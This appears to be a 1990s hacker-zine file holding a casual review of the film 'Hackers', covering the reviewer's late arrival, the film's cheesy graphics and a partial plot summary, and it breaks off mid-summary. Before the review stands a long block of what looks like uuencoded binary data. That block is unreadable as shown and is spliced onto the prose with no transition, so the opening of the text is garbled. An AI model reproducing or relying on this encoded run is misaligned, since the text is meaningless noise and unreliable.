M7>KGOOF3_4KNO]F]Z:M-]_`$S/<#]SW"I[5WX`6_8*A'7O(;:N'D+7_Y2%)V MUG:%[/,>+W9&PW/S8-;Y82$3IK![#9@DA:]L/U_APJN'P!E?>.D1#Y[4F[$* MP>5][UW_>AKG.:":CS7IN0ZAW.-`1,??".0;S/ M#WZFK7P0?U_[ZR)*?G^#&6D-RW&@2\&QQ!]D-`Y>E!Z,.]'^PW#ERY(8P_FPO!3<)!(@20 M&6RB#GS"__NV]C,]`.3!$EQ"@-LS=\I"+81"9Y/"D#.3]VL[Y--`O6I#9$J_ M,^RUV`NH\!LHKL@###R2RV.C.<2_.D1#+KP9;Q(X'&FQ\KA"0-RT[*/#0=Q" M4AL>1ERD]>A#@INKR#@T_TB,1$*CQ#S$.`4L16"I-)=\R5K$R).L0G>?Y#R?I$GYHT5^_*,Y8$>=)+Q6?)UFX471R[QC?!3:0T&JU+JI?$JV M>S10K#\.<;2_2TL4D,JI1$JFQ"O<P:HB%B\RETTS,L[^9 M?#"<6![LRTN@))I:F+VRG"Y`B+JN(TV]?#4E`\/QPC'-]+G:'*?47,R]=,U? M?$=+[,S:S)K=Y,UY]$WB;,W//,[>3$CE5$PD;,Y=!$[%@DZOA#WH9!4I,C[J M[,CGW,YYRTZ$]$[IE,/KO$B%P$[M]$[U#+5]O$2&6T__^`R6]D3/\(Q/^ZQ& M/[E&4B"J,[E/_P1/76$PF^#/]_Q/`S6I^122X#S0]:3/,5-0!HU0]J0)!_U* M";W0"[K-`L50#F4U#4W/#@W1T@3$Y5I0$>7-"B4?$SU1TDQ1L.LEUB11%IW1 M$943^R-#S3RO13(074I!14&B74,S74&474)E74 M18T0!AU/29U42F4Q"0J@2*U4_TW=U$J=(=-@5!_C5%$=5WDUWXET7^5 MS8"UUWN=UOK,2X$=V#N-!T3,U(*%A8G]O)*;!H7=L(:5B(Q%I8MM2O_5?=*K1==`5=>*!3F2 M,UDD#;B.74EPVEFS+=9@7=>QE2^GY;/=*WI5IA05,?W=46=5Q" M6ENR53?+_98SXES5U%PV!,Y3=:%P0EEW35QKU--E,USKZY.%K-5C_5;2Y=*W M@<(VYB M)WYB*!Y?&(Q?H]5;8'U6FWE5@_)5CM%UC-E;BME+BA9#:.?YC_/7=]75@/'8H,&:MS\W@ MR5WD0`9<0+%C_RWD?CID%;O;*PUC_T#.VDPN8T"^8Q6[2F<*9??[WO/[Y'^$ MV-S%A=*1IG^50SV67UFQVX7E/P2N93H>VGB*Y("XWUZBAIIC581MY03<+*]5 M95Z^W$IF(/-ZC%R>*4]"8:PDOV%F)5\^6N[UOZ<[YDXJ9H.8YI)!*T.,Y8IU M9$MVKCW4HX]DW9EM9F:37N]5V]159SU;YYB]6^#EPWDVRZ\-9YFUY\(-6Y1L MX$"1.%M]OSRT8OB#66VA9$;VMC2)0XQEI'06WEOF9%(>Y,;D'S"EZ$X^8$N^ M9&`68T:.V]G-U:F%79)FPCO&U>U=9$WV9%WNI(E=98QN8Y)KU/!@7_N1%S7N MK_!+U@8RW_]WH^?(S5%!)F279EZC]MXS1FJB1E5'9EZ/ENIK'MZ+]N2W+NB03FJ%WM]W[IKE MU4_(I>-.'D.*'6>+SNM3/J0OW;5>OEQRYFED0^:^CNLX%>JT?FJX;FLUMFN' M1LE-IFQW7L/$7EIJ<-Z4EEN@9>9:%FB(_N:2%+7#KM6PSFRVON95=>JS;>VH ME66TG3U9#NVW75.P#FQ6R>TG_4?:?NB6EFS:AM+)II17%A#<#*:MYA%U7EW8 M76!Z+FW')NOJ'M:!KF=2+FV`CD=EJV=VEF>"OF?MWFZ^[&?$EMS_.%YL])Y" M@9;7VI9K\&YG]<[H,5QHFPY(/I:]V>[=,BTYDLX9:!!>RX!8ZD3[>"G^TO=7=H69JU]9FO%WK28OFS6#H04)Q8#Q- ML';P;(5POGY>0A:(F);D05MP%`S=7L7L$*?9XM9?_DWK$K;QTKVRKS9Q!SS@ M^`9R&A1O=G9L(G\V'-]*BKKA*(]$%7=C$<;I*S_#+-]R9MS0+A_$+Z?37)31 M,??$,C?`&L[*LTSS:5SS,[]>.,=%.8=C(*US-9_RJ:)S/<=R/@-=5DW5%JO=3^]=5RO4UW?]3;M=5\O C4V`/]BX==F*G4F,_]B5-=F4/4F9O]AU]=FA?5% "Hackers" - A movie review by Juliet Well.. ReDragon asked me to write for FEH.. I had no idea to write and when I saw the ruckus in #hack after "Hackers" was released. So here it is.. It ended the weekend being in the top three movies this weekend. Well where should I begin.. I missed the first 20 minutes of the movie.. due to Sp00n giving me the wrong time, so I walked into the theatre and found my friends, it wasn't hard since there were 13 people in the theatre total including my seven friends and I. I was at first worried about walking in late.. and missing the complicated twists and turns of the plot, and then I remembered where I was.. Now I walked in there with some slight hope of realism in my heart, and then looked up and saw he was downloading on Mac.. you could see the cheezy graphix.. which was suppose to be the "Flow of Information".. . Personally they could have picked a cooler chick.. Alicia Silverstone or Drew Barrymore.. anyway lemme continue. I sat down and then my friend Dawn proceeded to throw pennies at me.. I absolutely loved the navigating through the Gibson.. it reminded me of playing Descent. Anyway.. I guess I should go over the plot of the movie so those of you who have NOT seen it, or we just to busy with your tounge down your girl/boyfriend's throat. "Dade Murphy.. AKA Zero Cool was busted when he was like 11.. for crashing 15,008 computer systems with his virus in 1 day.. and all they did to the brat was say he couldn't use a computer till he was.. he couldn't even use a tocuh-tone phone. Fade out.. Fade in.. Now Mr. Murphy is 18.. and hey gets a mac . And of course since he the techo-stud he is.. he hacks right into the TV station.. And someone called "Acid Burn" already owns this turf.. and he proceeds to tell "Mr"Acid Burn that "You mess with best, you die with the rest.." go figure.. anyway.. he pulls some school pranks.. decides he wants the chick wearing vinyl.. and "hacks" himself into her class.. oh.. what a rebel. while in her english class.. another hacker "Cereal Killer" who's real name is EMMANUEL GOLDSTEIN gets kicked out.. anyway, the dweebs in the school realize he is "/<-r4d-31337" so they take him to some techno trendy arcade/food place.. almost as cheesy as the @cafe. At this place is "Phreak", "Cereal", and Joey.. who has no handle.. and seems to remind me of Lestatt..